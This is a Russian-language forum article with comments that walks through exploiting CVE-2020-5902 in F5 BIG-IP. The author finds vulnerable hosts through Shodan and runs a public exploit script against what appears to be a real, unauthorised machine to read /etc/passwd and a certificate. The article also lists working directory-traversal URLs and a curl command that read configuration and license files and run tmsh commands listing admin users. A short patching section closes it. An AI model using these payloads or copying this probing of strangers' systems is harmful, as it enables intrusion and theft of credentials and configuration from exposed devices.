• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Эксплуатация CVE-2020-5902

cve-2020-5902f5ob.png


Приветствую Уважаемых Форумчан,Друзей и Читателей Форума.
Сегодня поговорим про уязвимость CVE-2020-5902.
Найдём уязвимую машину и проэксплуатируем данную уязвимость на конкретном примере.

Михаил Ключников обнаружил свежую уязвимость, которая сразу же была отмечена как критическая.
Был присвоен идентификатор CVE-2020-5902 и по шкале CVSS, уязвимость соответствует наивысшему уровню опасности.
Затрагивает она интерфейс контроллера приложений BIG-IP.
Атака злоумышленником на уязвимый контроллер может быть выполнена удалённо и от имени неавторизованного юзера.
Выполнение произвольного кода приводит к вероятной раскрутке LFI и RCE
Последнее легко реализуется,если компоненты системы настроены некорректно и выходят за пределы каталога.
А c помощью произвольного кода java можно создавать и удалять файлы на хосте.

Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.
Запрещено применять рассматриваемые методики атак в незаконных целях.


В новостях корпорация F5 отчиталась,что уязвимость исправлена успешно.
Но это зависит не только от корпорации,а больше от владельцев ресурсов и админов.

Для проверки попробуем найти хост с помощью поисковика Shodan.
Делаем запрос и получаем список подходящих машин.

cve-2020-5902shod.png


Админы некоторых уже прислушались к рекомендациям.
Проверить можно по IP-адресу с использованием различных скриптов.
Но я решил быстрее сделать это на он-лайн чекере.

cve-2020-5902check.png


Как видим, хост уязвим.
Взглянем на панель BIG-IP, всё на месте.

cve-2020-5902panel.png


Если мы просто применим какой-либо обычный скрипт,то он покажет,что машина не подвержена данной уязвимости.
Некоторые отработают,но им требуется указать директорию.
Народ поторопился с их созданием и такие скрипты ещё где-то надо допиливать.

Из всех подходящих скриптов,которые позволяют эксплуатировать такую уязвимость "на лету"-F5 BIG-IP.
Специалист John Jefferson Li с Филиппин написал несколько часов назад отличный bash-скрипт.
Здесь скрипту нужен всего лишь IP адрес , а директории он сам распознает.

Установка скрипта F5BIG-IP
Код:
# git clone https://github.com/itsjeffersonli/CVE-2020-5902.git
# cd CVE-2020-5902/
# chmod +x CVE-2020-5902.sh
# ./CVE-2020-5902.sh
Указали IP и далее предлагается сразу же эксплуатация.
Решаем как будем эксплуатировать ,через LFI или RCE

cve-2020-5902f5.png


RCE проводить не буду, т.к. вредить ресурсу не станем и никаких изменений с файлами тоже не будем делать.
Скрипт спросит какие файлы ему постараться вывести.

cve-2020-5902f51.png


Если задать /etc/passwd, то получаем этот файл.

cve-2020-5902f52.png


Можно выдернуть у цели и сертификат.

cve-2020-5902f53.png


Эксплуатировать данную уязвимость можно и классическим способом,с помощью Burpsuite.
Для этого перехватываем запрос до директории админки /login.jsp
Изменяем запрос и проводим атаку Directory Traversal:
Код:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Для RCE используется обычно утилита Curl:
Код:
curl -v -k  'https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Выводим список машин , входящих в сеть ресурса .

cve-2020-5902f54.png


И ,аналогично, получаем файл /etc/passwd

cve-2020-5902f55.png


Защита и заключение.
Только обновление до последних версий BIG-IP
Использовать BIG-IP Virtual Edition 14.1.2.6;15.1.0.4;13.1.3.4
А лучше выполнить все рекомендации безопасности

Несмотря на усилия корпорации F5,которая быстро отреагировала на выявленную уязвимость и приняла меры, много машин по-прежнему остаются наедине с такой бедой.
Всех Благодарю за внимание и до новых встреч.
 

Knotoni

Green Team
07.05.2020
27
106
BIT
0
Оперативно ребята работают - за несколько часов написали рабочий скрипт для эксплуатации уязвимости
За статью спасибо!
 
  • Нравится
Реакции: Xtamiaisa и Vertigo

Mogen

Red Team
27.08.2019
314
610
BIT
5
Всё происходит очень быстро.Надеюсь кто был подвержен этой уязвимости,поставит патч.
Статья быстро вышла. Сейчас пойду смотреть что такое F5.
Спасибо автору :)
 
  • Нравится
Реакции: Xtamiaisa и Vertigo

ITSerh

Member
16.09.2020
5
0
BIT
0
У меня глупый вопрос, с помощью каких инструментов Kali Linux вы находите такие уязвимости как CVE?
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
1
У меня глупый вопрос, с помощью каких инструментов Kali Linux вы находите такие уязвимости как CVE?
Без разницы какой дистрибутив,в основном сканерами безопасности Nessus ,Openvas,или загруженном сканером в Burpsuite.
Последние синхронизированы с базами уязвимостей.
Но свежие CVE редко вносятся в базы,к которым обращаются сканеры.
Приходится пользоваться поисковиком shodan и готовыми скриптами для проверки,что сложности не представляет.
 
Последнее редактирование:
  • Нравится
Реакции: qwe123xcv
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!